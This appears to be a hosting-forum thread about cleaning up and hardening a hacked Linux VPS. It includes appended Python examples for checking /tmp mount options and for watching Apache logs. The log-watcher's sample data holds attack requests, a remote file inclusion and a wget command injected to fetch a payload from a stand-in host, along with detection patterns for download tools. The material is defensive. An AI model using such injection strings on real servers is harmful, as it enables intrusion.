  1. #1
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540

    [Hacked] Now what?

    Ok, I just had a personal VPS hacked, which in a way is a good thing. This VPS is strictly for me to learn Linux and security, and hosts a few of my personal sites.

    Now, this isn't the first time it's happened, but last time I just deleted phpbb, cleaned up /tmp and chmod 1777 it.

    But now r0nin has appeared. I don't believe they have root, since I have su - set up and it emails me when root logs in.

    So, in /tmp there is the r0nin file and a folder called sql (left over from last time, although inactive); it contains a .htm, a .txt and a php mailer. Not too worried about these, as I have practised securing this VPS, and my mail queue is still empty.

    So, the question is: how do I find out who owns the files, where do I look to see how they did it, and via which domain? After I have found these things out I will be mounting /tmp noexec, nosuid etc.


    Thanks, Philip
    BTi-Hosting.co.uk High quality hosting, low low prices.
    One step ahead of the competition - Today IS tomorrow.
    FraudWise.Net - Fight the fraud!

  2. #2
    Join Date
    Sep 2005
    Location
    Essex, England
    Posts
    548
    The bash command history will come in handy in your case, I think.

  3. #3
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    ls -alh /tmp
    will show the owner, it is probably nobody. Look at the apache logs to find out where it came from, they may have something.

    Noexec/nosuid will not help against Perl programs, but it will help with binary programs. Bash history will probably show nothing, since they were most likely put in via a php injection.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  4. #4
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540
    Yep, it's nobody all right. Just going to delete now, chmod again and get rid of wget.

    Just got rid of the old version of IPB too, which I suspect was the culprit.

  5. #5
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    sometimes they use curl to download files too, there are a lot of possibilities to getting files on a system.

  6. #6
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540
    Thanks, I need all the info I can get. Only been doing this for about a month, never touched Linux beforehand, but I want to be able to get servers running myself at some point, rather than wait for my admin to get outta bed.

  7. #7
    Join Date
    Dec 2002
    Location
    chica go go
    Posts
    11,876
    Chmod wget, curl, lynx, ftp, etc to 700. I also recommend you install mod_security for apache.

  8. #8
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540
    I have mod_security installed, but could not install a ruleset because it would break all images on the VPS.

  9. #9
    Join Date
    Jul 2001
    Location
    Singapore
    Posts
    1,889
    Why delete those files in /tmp? For me, I would rather chmod them to 000, owned by root, and chattr them, so that if the same exploit from the same person, or one using the same method, tries to write/create the same filenames/directories, it won't be able to, because they are already there...

    Just my thoughts

  10. #10
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540
    Darn, I deleted them 20 seconds before reading this

    But thanks anyway, that's what this thread's for: information.

  11. #11
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540
    Well, I went back into top, saw a few more processes than usual, so I checked /tmp and guess what, it's back! How the jiggy did that happen?

    Which logs do I need to check?

  12. #12
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    You are probably getting exploited by the same exploit over and over. I cannot remember if ronin was one that needed a reboot. I would suggest installing mod_security and disabling unneeded php functions. Now go in and delete all the r0nin stuff and kill the processes.

  13. #13
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540
    I've disabled exec, shell_exec, passthru, popen and system. There is nothing exploitable on the server anymore; I removed ipb and phpbb before deleting the last r0nin file.

    Where do I put the mod_security rules? Last time I added them to httpd.conf (I think it was), images/css on the server stopped loading.

    Thanks, Philip

  14. #14
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    Originally posted by Philipf
    I've disabled exec, shell_exec, passthru, popen and system. There is nothing exploitable on the server anymore; I removed ipb and phpbb before deleting the last r0nin file.

    Where do I put the mod_security rules? Last time I added them to httpd.conf (I think it was), images/css on the server stopped loading.

    Thanks, Philip
    Yes, that is how you should do it. Check the audit log (/usr/local/apache/logs/audit_log) to see if mod_sec is the cause of the image/css problem. The ruleset you are using may be too sensitive or in some way causing other trouble.

    Also make sure you put the mod_sec rules below the AddModule/LoadModule part, but not inside some If section (like something controlling image types).

  15. #15
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540
    Ok, another problem now. I'm trying to secure tmp properly, using:

    # Create a 100 MB file-backed filesystem and mount it on /var/tmp with noexec,nosuid
    dd if=/dev/zero of=/dev/tmpMnt bs=1024 count=100000
    mke2fs /dev/tmpMnt
    mount -o loop,noexec,nosuid,rw /dev/tmpMnt /var/tmp
    chmod 1777 /var/tmp       # sticky bit, so users cannot remove each other's files
    mv /tmp /tmp.old          # /tmp must not exist as a directory, or ln creates /tmp/tmp
    ln -s /var/tmp /tmp

    Add this to your fstab
    /dev/tmpMnt /var/tmp ext2 loop,noexec,nosuid,rw 0 0


    But when I type mke2fs, it says command not found, so I ran

    'locate mke2fs'

    And nothing happened, so I switched it to 'locate mkfs' and it finds it, but if I use it to make /dev/tmpmnt it says file or folder not found.

    Any ideas?

  16. #16
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    Try:

    mkfs.ext2


    instead

  17. #17
    Join Date
    Jan 2004
    Location
    Ellesmere Port, Wirral, UK
    Posts
    1,540
    Gives the same error.

    Tried with the path (/sbin) too, but no luck; it just says mkfs.ext2: No such file or directory.

  18. #18
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    Originally posted by Philipf
    Gives the same error.

    Tried with the path (/sbin) too, but no luck; it just says mkfs.ext2: No such file or directory.
    Ok, well, install the e2fsprogs rpm then and that should give you the tools.
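    Once /tmp is remounted this way, it is worth confirming that the options actually took effect. The check below is an added example, not code from the thread: it parses /proc/mounts-format text (the sample is constructed) and follows the /tmp -> /var/tmp symlink the howto creates.

```python
"""Check that /tmp and /var/tmp are separate mounts carrying noexec,nosuid.
Added example, not code from the thread; the sample data below is constructed."""
import os

REQUIRED = {"noexec", "nosuid"}

# Constructed /proc/mounts content: /var/tmp is the loop-mounted file from the
# thread, /tmp itself is a symlink to it, /dev/shm is mounted without hardening.
SAMPLE_MOUNTS = """\
/dev/root / ext3 rw 0 0
/dev/loop0 /var/tmp ext2 rw,noexec,nosuid 0 0
none /dev/shm tmpfs rw 0 0
"""

def parse_mounts(text):
    """Map mountpoint -> set of mount options from /proc/mounts-format text."""
    mounts = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 4:            # device mountpoint fstype options [dump pass]
            mounts[parts[1]] = set(parts[3].split(","))
    return mounts

def check_tmp_mounts(text, paths=("/tmp", "/var/tmp"), resolve=lambda p: p):
    """Return {path: problem}: None when hardened, 'not a separate mount' when the
    path lives on the root filesystem, else the sorted list of missing options.
    `resolve` follows symlinks (the thread links /tmp -> /var/tmp)."""
    mounts = parse_mounts(text)
    report = {}
    for path in paths:
        target = resolve(path)
        if target not in mounts:
            report[path] = "not a separate mount"
        else:
            missing = REQUIRED - mounts[target]
            report[path] = sorted(missing) if missing else None
    return report

def check_live():
    """Run the check against the real system, following symlinks."""
    with open("/proc/mounts") as f:
        return check_tmp_mounts(f.read(), resolve=os.path.realpath)

if __name__ == "__main__":
    for path, problem in check_live().items():
        print(f"{path}: {'OK' if problem is None else problem}")
```

    A path that comes back as "not a separate mount" still sits on the root filesystem, so the noexec/nosuid options in fstab are not protecting it.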

  19. #19
    What I suggest is to recompile Apache with phpsuexec enabled (you can do this with /scripts/easyapache), so Apache runs in user mode rather than as nobody. Then you can easily track the user by checking the file ownership.

  20. #20
    Join Date
    Nov 2002
    Location
    Bay Area, California
    Posts
    309
    Hello,

    I think it's great that you are learning Linux.

    But I would say that cleaning a hacked box is an undesirable thing to do. We have a lot of years of experience here, but we still prefer to reinstall if we suspect a compromise.

    The best setup for a linux box, imho, is to start on your console by turning basically everything off. Then use iptables or some such to block all traffic to the box except your own.

    Then you start thinking about your services, one at a time. Look at what your os provides for that service and do research. See if there are other well known packages you might consider using for providing that service.

    Read about previous security problems with each package you might use to provide the service. Look for open bug reports. Look at how active the community is in responding to bug reports on each package. See if the package has a mailing list for security announcements, and for discussing issues with other users.

    Consider the code. Is it in a language you can at least read? Do you feel that, if you wanted to disable a feature that had been found to be insecure, you might be able to do it yourself even before a patch was announced? Does the package provide useful levels of logging in order to let you monitor (programmatically) the use of the service? Do the configuration options provided by the authors look like they were considering security when they wrote it?

    When you find a package you like, plan for it to be compromised and install it in a way so that even if it is compromised, an intruder will learn little or nothing, and will not gain access to other services or resources. This means use separate machines, or ip addresses, or usernames, or disk partitions, or directories, or whatever, in order to isolate this service from every other part of your system.

    Then configure logging. One of the most useful things you can learn to do as a linux administrator is to write small scripts which monitor your logs. Tell your script to ignore types of lines you expect to see, and have them act, or notify you, when they see lines you don't expect to see.

    Have your scripts watch the amount of use the service is getting, so you know when you have an unusual amount of usage. Have them monitor the amount of system resources the service is using, so you know if it is beginning to impact other services.

    Configure iptables, or whatever, to allow traffic to reach this newly configured service. Expect that some approaches to the service will be unwanted and build a banlist for the service from the very outset.

    Ideally those watcher scripts you are learning to make will be able to add ips to the banlist, and control the rate of requests for service that are permitted to pass the firewall.

    omg, I must stop typing. But all this is stuff you do before you even turn the service on!

    Luxore
    Sunwave Communications
    http://www.sunwave.com/
    Safety - Service - Economy
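    The watcher scripts Luxore describes, reduced to one small example that is added here and is not from the thread: lines matching what you expect are dropped, everything else is reported, and a per-IP count gives the usage figure. The Apache log lines and the "expected" patterns are constructed assumptions.

```python
"""Log watcher of the kind described in the post above: drop lines you expect, report the rest.
Added example, not from the thread; the Apache log lines below are constructed."""
import re
from collections import Counter

# Constructed Apache combined-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2006:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2006:10:01:03 +0000] "GET /images/logo.png HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.0.2.77 - - [12/Mar/2006:10:02:10 +0000] "GET /forum/index.php?act=http://203.0.113.9/r0nin.txt HTTP/1.0" 200 233 "-" "libwww-perl/5.803"
192.0.2.77 - - [12/Mar/2006:10:02:11 +0000] "GET /forum/index.php?cmd=wget%20http://203.0.113.9/r0nin HTTP/1.0" 200 233 "-" "libwww-perl/5.803"
10.0.0.9 - - [12/Mar/2006:10:03:00 +0000] "GET /nosuchpage HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# Requests this site expects (assumed for the example): 2xx fetches of the front
# page and static assets. Everything else is reported.
EXPECTED = [re.compile(r'^GET /(index\.php|images/.*|css/.*)$')]

def classify(line):
    """Return None for an expected line, otherwise a short reason to report it."""
    m = LINE_RE.match(line)
    if not m:
        return "unparseable line"
    request = f"{m['method']} {m['path']}"
    if m['status'].startswith("2") and any(p.match(request) for p in EXPECTED):
        return None
    path = m['path'].lower()
    if re.search(r'=(https?|ftp)://', path):            # remote URL handed to a PHP include
        return "URL in query string (remote file inclusion attempt)"
    if re.search(r'(wget|curl|lynx)(%20|\+| )', path):  # download tool named in the request
        return "download tool name in request"
    return f"unexpected request (status {m['status']})"

def watch(log_text):
    """Return (findings, requests_per_ip); findings is a list of (ip, reason, request)."""
    findings, per_ip = [], Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        ip = m["ip"] if m else "?"
        if m:
            per_ip[ip] += 1
        reason = classify(line)
        if reason is not None:
            findings.append((ip, reason, line.split('"')[1] if m else line))
    return findings, per_ip
```

    Run watch() from cron over the lines the access log gained since the last run and mail yourself anything in findings; the per-IP counter is the input for the banlist logic the post goes on to describe.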
